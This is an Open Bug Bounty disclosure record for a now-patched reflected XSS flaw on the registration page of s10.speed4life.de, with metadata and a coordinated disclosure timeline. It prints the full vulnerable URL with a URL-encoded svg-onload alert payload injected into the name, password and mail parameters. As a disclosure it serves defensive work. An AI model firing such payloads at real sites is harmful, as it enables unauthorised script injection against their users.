s10.speed4life.de XSS vulnerability

2017-07-23T06:35:00
ID OBB:266978
Type openbugbounty
Reporter secuninja
Modified 2017-08-22T22:38:00

Description

Vulnerable URL:
http://s10.speed4life.de/vers3/allgemein/register.php?action=insert&name;=%22%2F%3E%27%3E%22%3EI%3Ci%3EI%3Csvg%2Fonload%3Dalert(%2Fopenbugbounty%2F)%3E&password;=%22%2F%3E%27%3E%22%3EI%3Ci%3EI%3Csvg%2Fonload%3Dalert(%2Fopenbugbounty%2F)%3E&mail;=%22%2F%3E%27%3E%22%3EI%3Ci%3EI%3Csvg%2Fonload%3Dalert(%2Fopenbugbounty%2F)%3E&agb;=1&wagen;=Ello%20Barero&color;=blau
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check s10.speed4life.de SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 July, 2017 06:35 GMT
Generic security notifications sent to website owner| 23 July, 2017 06:38 GMT
Customized security notification sent to website owner| 23 July, 2017 06:38 GMT
Vulnerability details disclosed by researcher| 22 August, 2017 07:17 GMT
Vulnerability patched by the website owner| 22 August, 2017 22:38 GMT